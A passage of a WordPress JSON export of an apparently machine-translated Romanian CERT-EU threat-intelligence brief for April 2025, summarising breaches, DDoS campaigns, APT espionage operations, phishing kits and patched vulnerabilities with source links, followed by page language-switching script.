&Icirc;nc&#259;lcarea poate afecta p&acirc;n&#259; la 200.000 de clien&#539;i, cu nume &#537;i adrese de e-mail expuse de la m&#259;rcile Europcar Goldcar &#537;i Ubeeqo. Europcar a confirmat &icirc;nc&#259;lcarea GitLab, a notificat autorit&#259;&#539;ile &#537;i contacteaz&#259; utilizatorii afecta&#539;i. Nu au fost compromise parole sau informa&#539;ii de plat&#259;.<code>transport<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.bleepingcomputer.com\/news\/security\/europcar-gitlab-breach-exposes-data-of-up-to-200-000-customers\/\">link<\/a> <\/p><h3 id=\"hacktivism\">Hacktivism<\/h3><p><strong>Presupusi hacktivi&#537;ti lega&#539;i de Rusia vizeaz&#259; organiza&#539;iile finlandeze legate de alegeri<\/strong><br>Pe 8 aprilie, potrivit ziarului finlandez Yle, presupu&#537;ii hacktivi&#537;ti NoName057(16) lega&#539;i de Rusia &#537;i-au revendicat responsabilitatea pentru mai multe atacuri DDoS care au vizat aproape toate partidele parlamentare finlandeze, precum &#537;i mai multe organiza&#539;ii &#537;i site-uri web ale unor indivizi. Site-urile web legate de alegeri au fost printre &#539;inte. Grupul sus&#539;ine c&#259; atacurile r&#259;spund la propunerea de &icirc;ncetare a focului din Ucraina de c&#259;tre pre&#537;edintele Stubb.<code>rusia<\/code> <code>alegeri<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/yle.fi\/a\/74-20154753\">link<\/a> <\/p><p><strong>Hacktivi&#537;tii pro-rusi vizeaz&#259; organiza&#539;iile publice olandeze &icirc;n atacuri DDoS<\/strong><br>Pe 30 aprilie, actorul de amenin&#539;&#259;ri pro-rus NoName057(16) a perturbat serviciile publice &#537;i private olandeze cu atacuri DDoS &icirc;n curs, viz&acirc;nd site-uri web din mai multe provincii &#537;i municipalit&#259;&#539;i. Grupul a pretins pedeapsa pentru ajutorul militar acordat Ucrainei. &Icirc;n ciuda &icirc;ntreruperilor de serviciu, oficialii olandezi au confirmat c&#259; niciun sistem intern nu a fost compromis. Actorul criminalit&#259;&#539;ii cibernetice &icirc;&#537;i continu&#259; campania prin intermediul platformei DDoSia.<code>rusia<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.ncsc.nl\/actueel\/nieuws\/2025\/04\/30\/lopende-ddos-aanvallen-op-nederlandse-organisaties\">link<\/a><\/p><p><strong>Coali&#539;ia de hacktivi&#537;ti Holy League vizeaz&#259; armata britanic&#259; cu atacuri DDoS<\/strong><br>Pe 7 aprilie, mai multe institu&#539;ii de pres&#259; au relatat despre Holy League, o coali&#539;ie format&#259; din aproximativ 90 de grupuri hacktiviste pro-ruse &#537;i pro-palestiniene, care lanseaz&#259; s&#259;pt&#259;m&acirc;nal atacuri DDoS asupra armatei &#537;i agen&#539;iilor de infrastructur&#259; britanice. Misiunea lor este de a conduce r&#259;zboi cibernetic &icirc;mpotriva alia&#539;ilor Ucrainei &#537;i Israelului.<code>ap&#259;rare<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/insight.scmagazineuk.com\/holy-league-claims-attack-on-ukraine-allies\">link<\/a> <\/p><h2 id=\"world\">Lumea<\/h2><h3 id=\"cyber-policy-and-law-enforcement-2\">Politica cibernetic&#259; &#537;i aplicarea legii<\/h3><p><strong>FBI caut&#259; ajutor public pentru a identifica hackerii Salt Typhoon din spatele &icirc;nc&#259;lc&#259;rilor de telecomunica&#539;ii<\/strong><br>Pe 24 aprilie, FBI a solicitat asisten&#539;&#259; public&#259; &#537;i a anun&#539;at o recompens&#259; de p&acirc;n&#259; la 10 milioane de dolari SUA pentru informa&#539;ii de identificare a hackerilor Salt Typhoon, un grup chinez de spionaj cibernetic responsabil pentru &icirc;nc&#259;lc&#259;ri &icirc;n re&#539;elele de telecomunica&#539;ii din SUA &#537;i globale. Ace&#537;ti hackeri au ob&#539;inut acces la date sensibile, inclusiv la comunica&#539;iile private ale oficialilor americani &#537;i &icirc;nc&#259; vizeaz&#259; furnizorii de telecomunica&#539;ii din &icirc;ntreaga lume, cu investiga&#539;ii &icirc;n desf&#259;&#537;urare &#537;i poten&#539;iale sanc&#539;iuni asupra firmelor chineze conexe.<code>China<\/code> <code>state unite<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.ic3.gov\/PSA\/2025\/PSA250424-2\">link<\/a> <\/p><p><strong>SUA implementeaz&#259; un program de securitate na&#539;ional&#259; pentru a proteja datele sensibile ale americanilor de adversarii str&#259;ini<\/strong><br>Pe 11 aprilie, Departamentul de Justi&#539;ie al SUA a &icirc;nceput s&#259; implementeze un program de securitate na&#539;ional&#259; &icirc;n temeiul Ordinului executiv 14117 pentru a &icirc;mpiedica adversarii str&#259;ini precum China, Rusia &#537;i Iran s&#259; acceseze datele personale sensibile ale americanilor &#537;i cele legate de guvern. Ini&#539;iativa urm&#259;re&#537;te s&#259; contracareze amenin&#539;&#259;rile precum spionajul &#537;i supravegherea activat&#259; de AI prin restric&#539;ionarea tranzac&#539;iilor de date &#537;i aplicarea de noi m&#259;suri de conformitate.<code>inteligen&#539;&#259; artificial&#259;<\/code> <code>state unite<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.justice.gov\/opa\/pr\/justice-department-implements-critical-national-security-program-protect-americans-sensitive\">link<\/a> <\/p><p><strong>Trump &icirc;l concediaz&#259; pe directorul NSA la sfatul Laura Loomer, potrivit Washington Post<\/strong><br>Pe 2 aprilie, generalul Timothy Haugh a fost demis din func&#539;ia de director al Agen&#539;iei de Securitate Na&#539;ional&#259; a SUA (NSA), conform informa&#539;iilor, dup&#259; sfatul activistei de extrem&#259; dreapta Laura Loomer, potrivit The Washington Post. Loomer l-a &icirc;ndemnat pe pre&#537;edintele Trump s&#259; &icirc;ndep&#259;rteze oficialii pe care i-a considerat insuficient de loiali. Decizia a atras critici din partea democra&#539;ilor de v&acirc;rf, care &#537;i-au exprimat &icirc;ngrijorarea cu privire la implica&#539;iile securit&#259;&#539;ii na&#539;ionale.<code>state unite<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/apnews.com\/article\/trump-national-security-agency-tim-haugh-ec08b455e2c1112f5c6bb1881fad73e2\">link<\/a> <\/p><p><strong>China recunoa&#537;te &icirc;n mod tacit activitatea cibernetic&#259; care vizeaz&#259; infrastructura SUA<\/strong><br>La 10 aprilie, Wall Street Journal a raportat c&#259; &icirc;n timpul unei &icirc;nt&acirc;lniri confiden&#539;iale de la Geneva &icirc;n decembrie 2024, oficialii chinezi au semnalat indirect c&#259; Beijingul a sprijinit intruziunile cibernetice &icirc;mpotriva infrastructurii critice din SUA. Activitatea, legat&#259; de Volt Typhoon, a fost conceput&#259; ca un r&#259;spuns la sprijinul SUA pentru Taiwan. Oficialii americani au interpretat remarcile ca pe un avertisment strategic pe fondul escalad&#259;rii tensiunilor.<code>China<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.wsj.com\/politics\/national-security\/in-secret-meeting-china-acknowledged-role-in-u-s-infrastructure-hacks-c5ab37cb\">link<\/a> <\/p><p><strong>China restric&#539;ioneaz&#259; exporturile de minerale rare<\/strong><br>La 13 aprilie, New York Times a raportat c&#259; China a impus noi restric&#539;ii la export pentru minerale &#537;i magne&#539;i din p&#259;m&acirc;nturi rare, necesit&acirc;nd licen&#539;e speciale. Aceste materiale sunt cruciale pentru produc&#539;ia de semiconductori. &Icirc;n plus, Ministerul Comer&#539;ului din China, al&#259;turi de Administra&#539;ia General&#259; a V&#259;milor, ar fi interzis firmelor chineze s&#259; se angajeze cu mai multe companii americane, &icirc;n special cu contractori militari.<code>China<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.nytimes.com\/2025\/04\/13\/business\/china-rare-earths-exports.html\">link<\/a> <\/p><h3 id=\"cyberespionage-and-prepositioning-2\">Ciberspionaj &#537;i prepozi&#539;ionare<\/h3><p><strong>Suspectat actor chinez de amenin&#539;are UNC5221 care exploateaz&#259; &icirc;n mod activ vulnerabilitatea critic&#259; Ivanti Connect Secure<\/strong><br>Pe 3 aprilie, Ivanti a dezv&#259;luit CVE-2025-22457, o vulnerabilitate critic&#259; de dep&#259;&#537;ire a memoriei tampon &icirc;n dispozitivele Ivanti Connect Secure VPN, permi&#539;&acirc;nd executarea de cod de la distan&#539;&#259;. Mandiant &#537;i Ivanti au raportat exploatare activ&#259; de la mijlocul lunii martie de c&#259;tre UNC5221, un grup de spionaj suspectat de China-nexus, care implementeaz&#259; programe malware personalizate. Un patch a fost lansat pe 11 februarie 2025; utilizatorii sunt &icirc;ndemna&#539;i s&#259; fac&#259; upgrade imediat.<code>China<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/cloud.google.com\/blog\/topics\/threat-intelligence\/china-nexus-exploiting-critical-ivanti-vulnerability?hl=en\">link<\/a> <\/p><p><strong>APT chinezesc IronHusky vizeaz&#259; guvernul rus cu software-ul malware actualizat MysterySnail<\/strong><br>Pe 17 aprilie, Kaspersky a raportat c&#259; hackerii IronHusky vorbitori de limb&#259; chinez&#259; vizeaz&#259; organiza&#539;iile guvernamentale ruse &#537;i mongole care folosesc programul malware actualizat MysterySnail RAT. Implantul actualizat, observat &icirc;n recentele atacuri, este implementat prin intermediul scripturilor MMC r&#259;u inten&#539;ionate deghizate &icirc;n documente Word, care descarc&#259; &icirc;nc&#259;rc&#259;turi utile din a doua etap&#259; &#537;i stabilesc persisten&#539;a pe sistemele compromise.<code>China<\/code> <code>rusia<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/securelist.com\/mysterysnail-new-version\/116226\/\">link<\/a> <\/p><p><strong>China acuz&#259; serviciile de informa&#539;ii americane c&#259; vizeaz&#259; firma criptografic&#259; chinez&#259;<\/strong><br>Pe 28 aprilie, CSIRT na&#539;ional&#259; din China (CNCERT) a raportat despre o opera&#539;iune de spionaj cibernetic din 2024, &icirc;n care o agen&#539;ie de informa&#539;ii american&#259; a vizat un furnizor chinez de top de produse criptografice comerciale, fur&acirc;nd datele clien&#539;ilor &#537;i fi&#537;ierele de proiect de cod. CNCERT a declarat c&#259; actorul de amenin&#539;are legat de SUA a func&#539;ionat &icirc;n principal &icirc;n timpul orelor de lucru din SUA &#537;i a folosit tactici de spionaj cibernetic la nivel &icirc;nalt. Aceast&#259; publica&#539;ie a fost probabil conceput&#259; ca un r&#259;spuns la rapoartele publice recente despre campania Volt Typhoon din China.<code>China<\/code> <code>state unite<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/mp.weixin.qq.com\/s\/kzdSrLdejED3MxSKtszUnA?\">link<\/a><\/p><p><strong>Aplica&#539;ia troianizat&#259; Alpine Quest folosit&#259; pentru a spiona opera&#539;iunile militare ruse&#537;ti<\/strong><br>Pe 21 aprilie, cercet&#259;torii de la compania rus&#259; de antivirus mobil Doctor Web au descoperit o nou&#259; campanie de programe spion pentru Android care se ascunde &icirc;n versiunile troiene ale aplica&#539;iei de cartografiere Alpine Quest, adesea folosit&#259; de solda&#539;ii ru&#537;i pentru planificarea zonelor de r&#259;zboi. Aplica&#539;ia r&#259;u inten&#539;ionat&#259;, promovat&#259; ca versiune Pro cracked, fur&#259; date sensibile, cum ar fi localizarea geografic&#259;, contactele &#537;i fi&#537;ierele - demonstr&acirc;nd cum supravegherea mobil&#259; este acum implementat&#259; de ambele p&#259;r&#539;i ale conflictului pentru informa&#539;iile militare.<code>ap&#259;rare<\/code> <code>rusia<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/news.drweb.com\/show\/?i=15006&amp;lng=en&amp;c=5\">link<\/a> <\/p><p><strong>Actorul de amenin&#539;are Sapphire Werewolf vizeaz&#259; probabil companii energetice ruse&#537;ti cu un furator Amethyst actualizat<\/strong><br>Pe 9 aprilie, BI.ZONE Threat Intelligence a raportat despre actorul de amenin&#539;are Sapphire Werewolf &#537;i furatorul s&#259;u &icirc;mbun&#259;t&#259;&#539;it Amethyst pentru a viza companiile de energie, distribuindu-l prin e-mailuri de phishing deghizate &icirc;n memorii de resurse umane &icirc;n limba rus&#259;. Programul malware actualizat include verific&#259;ri avansate ale mediului virtual &#537;i utilizeaz&#259; criptarea Triple DES pentru protec&#539;ia &#537;irurilor. Acesta colecteaz&#259; acredit&#259;ri de la browsere &#537;i aplica&#539;ii, trimi&#539;&acirc;nd date de sistem c&#259;tre anumite adrese. De asemenea, programul malware execut&#259; un PDF momeal&#259; &#537;i verific&#259; indicatorii ma&#537;inii virtuale.<code>energie<\/code> <code>rusia<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/bi-zone.medium.com\/sapphire-werewolf-refines-amethyst-stealer-to-attack-energy-companies-f55931a5c4d4\">link<\/a> <\/p><p><strong>Lazarus vizeaz&#259; organiza&#539;iile sud-coreene &icirc;n Opera&#539;iunea SyncHole<\/strong><br>Pe 24 aprilie, Kaspersky a raportat c&#259; &icirc;ntre noiembrie 2024 &#537;i februarie 2025, grupul nord-coreean Lazarus a lansat o campanie numit&#259; Operation SyncHole, care vizeaz&#259; cel pu&#539;in &#537;ase organiza&#539;ii din Coreea de Sud. Aceste organiza&#539;ii acoper&#259; industrii precum software, IT, finan&#539;e, produc&#539;ie de semiconductori &#537;i telecomunica&#539;ii. Opera&#539;iunea a exploatat vulnerabilit&#259;&#539;ile software-ului din Coreea de Sud pentru a executa atacuri la gaura de ap&#259; &#537;i pentru a instala diverse forme de malware.<code>finante<\/code> <code>coreea de nord<\/code> <code>tehnologie<\/code> <code>telecomunica&#539;ii<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/securelist.com\/operation-synchole-watering-hole-attacks-by-lazarus\/116326\/\">leg&#259;tur&#259;<\/a> <\/p><p><strong>Grupul Kimsuky APT exploateaz&#259; defectele RDP &#537;i MS Office &icirc;n campania global&#259; de spionaj cibernetic<\/strong><br>Pe 14 aprilie, cercet&#259;torii de la AhnLab Security Intelligence Center (ASEC) au dezv&#259;luit c&#259; grupul Kimsuky, legat de Coreea de Nord, exploateaz&#259; &icirc;n mod activ vulnerabilit&#259;&#539;ile RDP &#537;i Microsoft Office, &icirc;n special BlueKeep (CVE-2019-0708) &#537;i CVE-2017-11882, &icirc;ntr-o campanie global&#259; de spionaj cibernetic cunoscut&#259; sub denumirea de Lavorul cibernetic. Atacatorii implementeaz&#259; programe malware personalizate precum MySpy, RDPWrap &#537;i keylogger pentru a men&#539;ine accesul persistent &#537;i pentru a exfiltra datele sensibile din sectoarele vizate din Coreea de Sud, SUA, China, Japonia &#537;i multe altele.<code>coreea de nord<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/asec.ahnlab.com\/en\/87554\/\">link<\/a> <\/p><p><strong>APT36 exploateaz&#259; tema atacului Pahalgam pentru a viza guvernul indian cu Crimson RAT<\/strong><br>Pe 30 aprilie, firma de securitate cibernetic&#259; Seqrite a raportat c&#259; APT36, legat de Pakistan, a folosit documente de momeal&#259; pe tema atacurilor Pahalgam pentru a viza entit&#259;&#539;ile guvernamentale indiene. Campania a folosit malware Crimson RAT livrat prin fi&#537;iere Excel r&#259;u inten&#539;ionate cu macrocomenzi &icirc;ncorporate. Aceste fi&#537;iere au extras &#537;i au executat malware-ul &icirc;n timp ce afi&#537;au documente cu aspect legitim. Opera&#539;iunea a partajat infrastructura cu SideCopy, indic&acirc;nd coordonarea &icirc;ntre grupuri. &#8203;<code>India<\/code> <code>Pakistan<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.seqrite.com\/blog\/advisory-pahalgam-attack-themed-decoys-used-by-apt36-to-target-the-indian-government\/\">link<\/a><\/p><p><strong>Apple patch-uri dou&#259; exploatate zero-days &icirc;n atacuri direc&#539;ionate iPhone<\/strong><br>Pe 16 aprilie, Apple a lansat actualiz&#259;ri de urgen&#539;&#259; pentru a remedia dou&#259; zile zero&mdash;CVE-2025-31200 &icirc;n CoreAudio &#537;i CVE-2025-31201 &icirc;n RPAC&mdash;utilizate &icirc;n atacuri direc&#539;ionate iPhone. Defectele au afectat mai multe platforme Apple &#537;i au permis execu&#539;ia de cod de la distan&#539;&#259; &#537;i ocolirea PAC. Echipa de amenin&#539;&#259;ri Apple &#537;i Google au descoperit problemele. Utilizatorii sunt &icirc;ndemna&#539;i s&#259; actualizeze dispozitivele, &icirc;n ciuda faptului c&#259; atacurile sunt foarte vizate.<a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/support.apple.com\/en-us\/122282\">link<\/a> <\/p><p><strong>ClickFix: actori sponsoriza&#539;i de stat exploateaz&#259; noua tehnic&#259; de phishing &icirc;n sectoarele cheie<\/strong><br>Pe 17 aprilie, Proofpoint a raportat c&#259; actorii sponsoriza&#539;i de stat, inclusiv TA571, TA578, UAC-0050 &#537;i Storm-1865, au adoptat din ce &icirc;n ce mai mult tehnica de phishing &bdquo;ClickFix&rdquo;. Aceast&#259; metod&#259; &icirc;n&#537;al&#259; utilizatorii s&#259; execute comenzi PowerShell r&#259;u inten&#539;ionate prin mesaje de eroare false sau solicit&#259;ri CAPTCHA, ceea ce duce la infec&#539;ii cu malware, cum ar fi DanaBot, Lumma Stealer &#537;i AsyncRAT. &#538;intele includ sectoare precum transportul, logistica &#537;i ospitalitatea, cu campanii care uzurp&#259; identitatea unor servicii precum Booking.com &#537;i Microsoft SharePoint. &#8203;<a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.proofpoint.com\/us\/blog\/threat-insight\/around-world-90-days-state-sponsored-actors-try-clickfix\">link<\/a> <\/p><p><strong>Brazilia ar conduce spionaj cibernetic c&#259;tre Paraguay pe fondul negocierilor comerciale cu energie<\/strong><br>La 31 martie, UOL, o entitate media brazilian&#259;, a sus&#539;inut c&#259; Agen&#539;ia brazilian&#259; de informa&#539;ii (ABIN) a condus o campanie de spionaj cibernetic &icirc;n 2024 &icirc;mpotriva guvernului paraguayan pentru a ob&#539;ine informa&#539;ii sensibile cu privire la negocierile comerciale cu energie. Negocierile au vizat &icirc;n mod specific tarifele la hidrocentrala Itaipu.<a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.yahoo.com\/news\/brazils-government-admits-spying-paraguay-233533589.html\">link<\/a> <\/p><h3 id=\"cybercrime-2\">Crima cibernetic&#259;<\/h3><p><strong>Kitul de phishing Tycoon2FA adopt&#259; noi tehnici de evaziune<\/strong><br>Pe 10 aprilie, Trustwave a raportat c&#259; kitul de phishing Tycoon2FA a &icirc;ncorporat noi tactici de evaziune, inclusiv JavaScript obscurcat folosind caractere Unicode invizibile, provoc&#259;ri HTML5 CAPTCHA personalizate &#537;i scripturi anti-depanare. Aceste &icirc;mbun&#259;t&#259;&#539;iri urm&#259;resc s&#259; ocoleasc&#259; m&#259;surile de securitate &#537;i s&#259; &icirc;mpiedice analiza. Kitul continu&#259; s&#259; vizeze utilizatorii Microsoft 365, subliniind nevoia de strategii solide de detectare &icirc;mpotriva amenin&#539;&#259;rilor de phishing &icirc;n evolu&#539;ie.<a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.trustwave.com\/en-us\/resources\/blogs\/spiderlabs-blog\/tycoon2fa-new-evasion-technique-for-2025\/\">link<\/a> <\/p><p><strong>Campania de phishing uzurp&#259; identitatea serviciilor Cloudflare &#537;i folose&#537;te Telegram pentru a filtra IP-urile victimelor<\/strong><br>Pe 1 aprilie, cercet&#259;torii de la hunt.io au raportat c&#259; au urm&#259;rit o campanie de phishing care a folosit solicit&#259;ri false Cloudflare pentru a p&#259;c&#259;li utilizatorii s&#259; fac&#259; clic pe un link de redirec&#539;ionare r&#259;u inten&#539;ionat. Analize ulterioare au ar&#259;tat c&#259; actorii amenin&#539;&#259;rilor au folosit un canal Telegram &icirc;n limba rus&#259; &#537;i au folosit Telegram &icirc;n general pentru a filtra IP-urile victimelor.<a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/hunt.io\/blog\/russian-actor-cloudflare-phishing-telegram-c2\">link<\/a> <\/p><p><strong>Campania Lazarus ClickFake Interview vizeaz&#259; platformele de criptomonede<\/strong><br>Pe 31 martie, Sekoia a raportat c&#259; actorul de amenin&#539;are legat de Coreea de Nord, Lazarus, &#537;i-a continuat s&#259; vizeze sectorul criptomonedei prin interviuri false de angajare, &icirc;n ultima vreme prin a&#537;a-numitele interviuri ClickFake. ClickFake Interview folose&#537;te site-uri false pentru interviuri de angajare pentru a implementa o u&#537;&#259; Go backdoor &icirc;n mediile Windows &#537;i macOS, folosind tactica ClickFix.<code>coreea de nord<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/blog.sekoia.io\/clickfake-interview-campaign-by-lazarus\/\">link<\/a> <\/p><p><strong>Cookie-Bite PoC arat&#259; cum extensiile Chrome r&#259;u inten&#539;ionate pot ocoli MFA &#537;i pot deturna sesiunile cloud<\/strong><br>Pe 22 aprilie, cercet&#259;torii Varonis Threat Labs au dezv&#259;luit atacul Cookie-Bite, o dovad&#259; de concept care utilizeaz&#259; o extensie Chrome ascuns&#259; pentru a fura cookie-urile de sesiune Azure Entra ID &#537;i a ocoli protec&#539;iile MFA. Extensia r&#259;u inten&#539;ionat&#259; monitorizeaz&#259; evenimentele de conectare Microsoft, exfiltreaz&#259; token-urile de sesiune &#537;i le permite atacatorilor s&#259; le injecteze pentru acces deplin la servicii precum Microsoft 365 &#537;i Teams, eviden&#539;iind riscurile severe prezentate de extensiile de browser r&#259;u inten&#539;ionate &icirc;n mediile de identitate bazate pe cloud.<code>tehnologie<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.varonis.com\/blog\/cookie-bite\">link<\/a> <\/p><p><strong>Defectele Google OAuth &#537;i DKIM permit atacuri de phishing aproape nedetectabile<\/strong><br>Pe 15 aprilie, hackerii au exploatat o defec&#539;iune a sistemului DKIM al Google pentru a trimite e-mailuri de phishing care au trecut verific&#259;rile de autentificare &#537;i p&#259;reau s&#259; provin&#259; de la no-reply@google.com, duc&acirc;nd victimele c&#259;tre un portal de asisten&#539;&#259; Google fals g&#259;zduit pe sites.google.com. Prin abuzarea notific&#259;rilor OAuth &#537;i a domeniului de validare limitat al DKIM, atacatorii au creat mesaje extrem de conving&#259;toare de furt de acredit&#259;ri - o abordare care vizeaz&#259; &#537;i utilizatorii PayPal prin abuzuri similare de infrastructur&#259;.<code>tehnologie<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/threadreaderapp.com\/thread\/1912439023982834120.html\">link<\/a> <\/p><h3 id=\"data-exposure-and-leaks-2\">Expunerea datelor &#537;i scurgerile<\/h3><p><strong>SK Telecom confirm&#259; &icirc;nc&#259;lcarea programelor malware care expun&#259; date sensibile USIM<\/strong><br>Pe 22 aprilie, cel mai mare operator de telefonie mobil&#259; din Coreea de Sud, SK Telecom, a anun&#539;at c&#259; programele malware s-au infiltrat &icirc;n sistemele sale, expun&acirc;nd date sensibile USIM, cum ar fi IMSI, MSISDN &#537;i chei de autentificare dintr-un atac cibernetic descoperit pe 19 aprilie. abonati.<code>telecomunica&#539;ii<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/news.sktelecom.com\/211423\">link<\/a> <\/p><h3 id=\"information-operations-2\">Opera&#539;iuni de informare<\/h3><p><strong>China folose&#537;te IA &icirc;n opera&#539;iuni de informare care vizeaz&#259; Taiwan<\/strong><br>Pe 9 aprilie, The Japan Times a publicat un articol despre China care desf&#259;&#537;oar&#259; opera&#539;iuni de informare pe re&#539;elele sociale, &#537;i anume Facebook &#537;i TikTok, pentru a crea tulbur&#259;ri interne &icirc;n Taiwan. De fapt, Biroul de Securitate Na&#539;ional&#259; din Taiwan a publicat un raport despre utilizarea AI prin China pentru a promova aceste obiective, at&acirc;t &icirc;n &#8203;&#8203;generarea, c&acirc;t &#537;i &icirc;n difuzarea mesajelor. Scopul lor este s&#259; creeze diviziune &icirc;n popula&#539;ie.<code>inteligen&#539;&#259; artificial&#259;<\/code> <code>China<\/code> <code>Japonia<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.japantimes.co.jp\/news\/2025\/04\/08\/asia-pacific\/politics\/taiwan-china-ai-disinformation\/\">link<\/a> <\/p><h3 id=\"disruption-and-destruction-2\">Perturbare &#537;i distrugere<\/h3><p><strong>China acuz&#259; SUA de atacuri cibernetice &icirc;n timpul Jocurilor Asiatice de Iarn&#259;<\/strong><br>Pe 15 aprilie, autorit&#259;&#539;ile chineze au acuzat NSA american&#259; c&#259; a lansat atacuri cibernetice &icirc;n timpul Jocurilor Asiatice de Iarn&#259; din 2025 de la Harbin. Atacurile ar fi vizat infrastructura din provincia Heilongjiang &#537;i au &icirc;ncercat s&#259; acceseze datele personale ale sportivilor. Au fost numi&#539;i trei agen&#539;i NSA &#537;i au fost implicate universit&#259;&#539;i din SUA. China sus&#539;ine c&#259; activitatea a avut ca scop perturbarea sistemelor critice &#537;i furtul de informa&#539;ii sensibile.<code>China<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/news.cgtn.com\/news\/2025-04-15\/China-names-U-S-secret-agents-involved-in-Harbin-2025-cyberattacks-1CAgLi2gwKY\/p.html\">link<\/a> <\/p><div class=\"footnotes\"><hr><ol><li id=\"fn-1\"><p>Concluziile sau atribu&#539;iile f&#259;cute &icirc;n acest document reflect&#259; doar ceea ce raporteaz&#259; sursele disponibile public. Ele nu reflect&#259; pozi&#539;ia noastr&#259;.&nbsp;<a href=\"#fnref-1\" class=\"footnoteBackLink\" title=\"Jump back to footnote 1 in the text.\">&#8617;<\/a><\/p><\/li><\/ol><\/div><\/div>\n        <\/div>\n\n        <script>\n        function switchLanguage(lang) {\n            \/\/ Ascunde ambele versiuni\n            document.getElementById(\"content-ro\").style.display = \"none\";\n            document.getElementById(\"content-en\").style.display = \"none\";\n\n            \/\/ Reseteaz\u0103 stilurile butoanelor\n            document.querySelectorAll(\".lang-btn\").forEach(function(btn) {\n                btn.style.background = \"#e5e7eb\";\n                btn.style.color = \"#374151\";\n                btn.classList.remove(\"lang-btn-active\");\n            });\n\n            \/\/ Afi\u0219eaz\u0103 versiunea selectat\u0103\n            if (lang === \"ro\") {\n                document.getElementById(\"content-ro\").style.display = \"block\";\n                document.getElementById(\"btn-lang-ro\").style.background = \"#3b82f6\";\n                document.getElementById(\"btn-lang-ro\").style.color = \"white\";\n                document.getElementById(\"btn-lang-ro\").classList.add(\"lang-btn-active\");\n            } else {\n                document.getElementById(\"content-en\").style.display = \"block\";\n                document.getElementById(\"btn-lang-en\").style.background = \"#3b82f6\";\n                document.getElementById(\"btn-lang-en\").style.color = \"white\";\n                document.getElementById(\"btn-lang-en\").classList.add(\"lang-btn-active\");\n            }\n\n            \/\/ Salveaz\u0103 preferin\u021ba \u00een localStorage\n            localStorage.setItem(\"gpss_preferred_language\", lang);\n        }\n\n        \/\/ Restaureaz\u0103 preferin\u021ba utilizatorului la \u00eenc\u0103rcare\n        document.addEventListener(\"DOMContentLoaded\", function() {\n            var preferredLang = localStorage.getItem(\"gpss_preferred_language\") || \"ro\";\n            switchLanguage(preferredLang);\n        });\n\n        \/\/ Hover effects pentru butoane\n        document.querySelectorAll(\".lang-btn\").forEach(function(btn) {\n            btn.addEventListener(\"mouseenter\", function() {\n                if (!this.classList.contains(\"lang-btn-active\")) {\n                    this.style.background = \"#bfdbfe\";\n                    this.style.color = \"#1e40af\";\n                }\n            });\n            btn.addEventListener(\"mouseleave\", function() {\n                if (!this.classList.contains(\"lang-btn-active\")) {\n                    this.style.background = \"#e5e7eb\";\n                    this.style.color = \"#374151\";\n                }\n            });\n        });\n        <\/script>\n\n        <style>\n        .lang-btn:hover {\n            transform: translateY(-2px);\n            box-shadow: 0 4px 12px rgba(59, 130, 246, 0.3);\n        }\n        .lang-btn-active {\n            box-shadow: 0 4px 12px rgba(59, 130, 246, 0.4);\n        }\n        <\/style>","protected":false},"excerpt":{"rendered":"<p>\ud83c\udf0d Limb\u0103 \/ Language: \ud83c\uddec\ud83c\udde7 English (Original) \ud83c\uddf7\ud83c\uddf4 Rom\u00e2n\u0103 Traducere automat\u0103 \/ Automatic translation Cyber Brief (April 2025)May 2, 2025 &#8211; Version: 1TLP:CLEARExecutive summaryWe analysed 311 open source reports for this Cyber Brief1.Policy, cooperation, and law enforcement. The FBI sought help to identify Chinese hackers breaching telecoms. The US launched a program to shield sensitive [&hellip;]<\/p>\n","protected":false},"featured_media":0,"template":"","meta":{"footnotes":""},"ti_category":[198],"ti_source":[172],"ti_severity":[187],"class_list":["post-992324","threat_intelligence","type-threat_intelligence","status-publish","hentry","ti_category-threat-actor","ti_source-cert-eu","ti_severity-critical"],"_links":{"self":[{"href":"https:\/\/delve.ro\/ro\/wp-json\/wp\/v2\/threat-intelligence\/992324","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/delve.ro\/ro\/wp-json\/wp\/v2\/threat-intelligence"}],"about":[{"href":"https:\/\/delve.ro\/ro\/wp-json\/wp\/v2\/types\/threat_intelligence"}],"version-history":[{"count":0,"href":"https:\/\/delve.ro\/ro\/wp-json\/wp\/v2\/threat-intelligence\/992324\/revisions"}],"wp:attachment":[{"href":"https:\/\/delve.ro\/ro\/wp-json\/wp\/v2\/media?parent=992324"}],"wp:term":[{"taxonomy":"ti_category","embeddable":true,"href":"https:\/\/delve.ro\/ro\/wp-json\/wp\/v2\/ti_category?post=992324"},{"taxonomy":"ti_source","embeddable":true,"href":"https:\/\/delve.ro\/ro\/wp-json\/wp\/v2\/ti_source?post=992324"},{"taxonomy":"ti_severity","embeddable":true,"href":"https:\/\/delve.ro\/ro\/wp-json\/wp\/v2\/ti_severity?post=992324"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}